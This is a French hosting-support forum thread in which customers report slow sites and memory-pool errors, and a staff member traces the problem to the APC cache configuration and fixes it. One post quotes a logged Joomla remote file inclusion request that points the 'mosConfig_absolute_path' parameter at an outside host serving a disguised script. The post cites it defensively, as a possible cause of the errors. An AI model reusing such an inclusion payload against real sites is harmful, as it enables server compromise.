PHPNET Assistance

Informations PHPNET => Forum Technique et Commercial => Discussion démarrée par: Gini le 10 janvier 2011 à 15:45:28

Titre: Probleme?
Posté par: Gini le 10 janvier 2011 à 15:45:28
Bonjour,

j'ai du mal à accéder à certaines pages de mon site (www.jemennuie.net) hébergé sur le filer 5 :

Erreur 324 (net::ERR_EMPTY_RESPONSE) : Erreur inconnue


Edit : apparament ça à l'air de mieux fonctionner.
Je laisse quand meme le thread pour signaler le souci ;)
Titre: Re : Probleme?
Posté par: Nydaunvan le 10 janvier 2011 à 16:18:05
Bonjour,

j'ai testé pas mal de lien sur ton site et j'ai pas eu de soucis :x

Mais tout a l'heure vers 15h50 j'ai moi aussi eu des problemes avec une fonction gd (getimagesize) qui fonctionnait bien encore matin alors que je n'ai pas touché a cette fonction et mon script depuis des mois. Ca c'est planté tout seul et j'avais un message du genre : temps de réponse trop long. Même constat de la part des utilisateurs de mon site. Quelques minutes après c'est revenu normalement sans rien changer.

 :huh:
Titre: Re : Probleme?
Posté par: Nommam le 10 janvier 2011 à 16:28:32
pareil, y eu un plantage sur mes sites en debut d'apm
Titre: Re : Probleme?
Posté par: donovan le 12 janvier 2011 à 13:35:47
Pareil, mes sites sont hyper lent, et quasiment impossible de naviguer dans mes ftp... ca pédale dans la semoule ou quoi ??
Titre: Re : Probleme?
Posté par: thibaud le 12 janvier 2011 à 15:46:24
Votre site semble bien lent en effet...
Mais nous n'avons pas de souci de notre coté.
Pouvez vous vérifier vos scripts/appels exterieurs etc ?
Titre: Re : Probleme?
Posté par: thibaud le 12 janvier 2011 à 15:49:04
on le voit bien avec votre forum, qui est rapide:
http://ombilikal.org/forum2/index.php
Titre: Re : Probleme?
Posté par: Goudie le 13 janvier 2011 à 16:49:06
Bon, c'était lent ces derniers jours, mais aujourd'hui ça pédale carrément dans la semoule. En 2011 je quitterai PHPnet... :angry:
Titre: Re : Re : Probleme?
Posté par: marckisscool le 13 janvier 2011 à 20:10:27
Votre site semble bien lent en effet...
Mais nous n'avons pas de souci de notre coté.
Pouvez vous vérifier vos scripts/appels exterieurs etc ?

Bonjour thibaud,

Je confirme qu'il y a bien un soucis sur les filers, je suis sur le filer 4 et je constate depuis 3 jours une remontée d'erreur:
Citer
Unable to allocate memory for pool.
Le 12 janvier 2011 de 20h10 à 20h20, puis de 20h40 à 20h45.
Le 13 janvier 2011 de 1h45 à 2h05.

Il y a un soucis de pagination ce qui provoque en effet des ralentissements sur les filers.

Bonne journée.
Titre: Re : Probleme?
Posté par: thibaud le 13 janvier 2011 à 20:11:35
Nous allons ajouter plein de nodes d'ici 1 semaine environ.

67Ghz de plus,
72Go de ram en plus ...

Titre: Re : Probleme?
Posté par: thibaud le 13 janvier 2011 à 20:12:34
Vous avez cette erreur ou/en faisant quoi ?
Titre: Re : Probleme?
Posté par: marckisscool le 13 janvier 2011 à 20:35:52
L'erreur est générée par un require_once, en faite le fichier fait 4 require_once de fichier 20 à 40 Ko contenant des fonctions, il ne tourne pas en boucle et en plus ces requires ne sont sollicité qu'une seule fois lors du chargement de la page, d'ou ma surprise lors de l'erreur.
Ce qui m'etonnes c'est que depuis 2 jours je vois ces erreurs apparaître et en même temps je vois un gros paquet en journée de tentative d'exploit sur le produit joomla (qui n'existe pas chez moi) à des heures différentes vers 14h:
Citer
Today 14h58
63.247.131.134     
http://xxxxxxxxxx/index.php?mosConfig_absolute_path=http://centerpointfamily.info/home/libraries/pear/.../id1.gif??
tentative de Hack mosConfig_absolute_path

Je me demande si ce n'est pas en relation, elles n'ont aucun impact chez moi mais je trouve la coïncidence étrange.
Titre: Re : Probleme?
Posté par: marckisscool le 13 janvier 2011 à 20:45:34
Dans le doute je suis en train de récupérer les logs qui sont mises à dispo sur l'hébergement je vais analyser ça parce que ça m'intrigue, y'aurait il eu une montée de version de apache?
Titre: Re : Probleme?
Posté par: thibaud le 13 janvier 2011 à 20:46:24
je pense que c'est possible qu'il y ait un lien. Si les pirates envoient des grosses quantités
de données en GET ou en POST sur le script/dans certaines variables du script, peut etre
que cela engendre cette erreur.... ?

parce que coté nodes, la ram est monitorée en temps réel et jamais aucune machine ne
s'est retrouvée a ne plus avoir de ram et de swap.
il y a toujours du free sur ces machines et pas de swap, donc ca me semble difficile
d'avoir des soucis de ram dans ces conditions !

A voir :)

Pas de changement de version d'apache.
Titre: Re : Probleme?
Posté par: marckisscool le 13 janvier 2011 à 21:10:07
En y regardant de plus près dans la log http j'ai ça:
Citer
124.115.0.111 - - [12/Jan/2011:20:35:29 +0100] "GET /-Mise%20a%20jour-News%20sur%20la----msg-2161-10661.html HTTP/1.1" 200 10387 "-" "Sosospider+(+http://help.soso.com/webspider.htm)"

85.234.20.109 - - [12/Jan/2011:20:50:17 +0100] "GET /Liste_des_mods_integres_aux_forums_smfgratuit-topic-5-0.html HTTP/1.0" 200 142574 "http://agro-zap.ru" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"

81.52.143.33 - - [13/Jan/2011:01:54:22 +0100] "GET /attaque_de_suppositoires_-msg-1621-10182.html HTTP/1.1" 200 14821 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
Donc en effet cela peut venir du get, sachant que visiblement j'ai un rewriting qui ne tiens pas compte du debut du lien et la seule variable est l'index du message qui est sécurisé par un int. Ce qui m'intrigue c'est que ces page sont appelées les jours précédents sans aucun soucis par des robots identiques ou ceux de google.
Est ce qu'il est possible de pouvoir loguer dans la log apache les variables get et leurs contenu?
Titre: Re : Probleme?
Posté par: marckisscool le 13 janvier 2011 à 21:24:19
Thibaud je viens de trouver ça dans une log datant du 9 janvier:
Citer
93.174.93.199 - - [09/Jan/2011:03:21:40 +0100] "GET /Liste_des_mods_integres_aux_forums_smfgratuit-topic-5-0.html HTTP/1.0" 200 140102 "/Liste_des_mods_integres_aux_forums_smfgratuit-topic-5-0.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000"
Visiblement il s'agirait d'ip provenant de proxy et tentant de spammer , il s'agirait donc d'un spammer qui tente de poster sur un forum bloquer et qui n'y arrive pas, donc cela peut en effet être en relation avec l'idée du get dont tu faisais allusion.
Je vais essayer de surveiller ça pour la fin de la semaine.

Merci thibaud
Titre: Re : Probleme?
Posté par: marckisscool le 13 janvier 2011 à 21:38:22
Je viens de voir une montée de version toute récente de php et de apc cache, et je viens de trouver un message interessant: http://www.linux-solved.com/post/Unable-to-allocate-memory-for-pool-php-apc-solved-65686.html
A priori cela pourrait provenir de la configuration de apc cache, est ce que cela touche tous les hébergements mutualisés ce apc?
Je me disais que c'etait bizarre de ne pas avoir cette génération d'erreur avant  ^_^
Titre: Re : Probleme?
Posté par: thibaud le 14 janvier 2011 à 08:02:59
Oui, bien vu!
cela vient surement du cache APC.

J'ai fait des modifs sur sa config hier soir.
est-ce qu'il y a toujours des erreurs depuis ?
Titre: Re : Probleme?
Posté par: thibaud le 14 janvier 2011 à 13:20:17
ca doit aller bien mieux déja les performances, non ?
On a isolé quelques comptes qui consommaient beaucoup de CPU et mis sur un cluster "a part".
Titre: Re : Re : Probleme?
Posté par: Gini le 14 janvier 2011 à 21:00:34
ca doit aller bien mieux déja les performances, non ?
On a isolé quelques comptes qui consommaient beaucoup de CPU et mis sur un cluster "a part".

Ça à l'air d'être plus rapide!
Titre: Re : Probleme?
Posté par: marckisscool le 15 janvier 2011 à 09:15:58
Bonjour thibaud,

Il y a une sacré amélioration, je suis passé de 10 jusqu'à 30 secondes pour de la génération de page à 0.138 secondes.
De mon côté je n'ai plus aucune remontée d'erreur depuis ta correction, nikel, je pense que l'on peut clore le problème.

Merci thibaud
Titre: Re : Probleme?
Posté par: thibaud le 15 janvier 2011 à 10:11:31
ah cool ca :)

et puis avec la patate qu'on va ajouter la semaine prochaine, la, ca devrait etre vraiment tiptop !!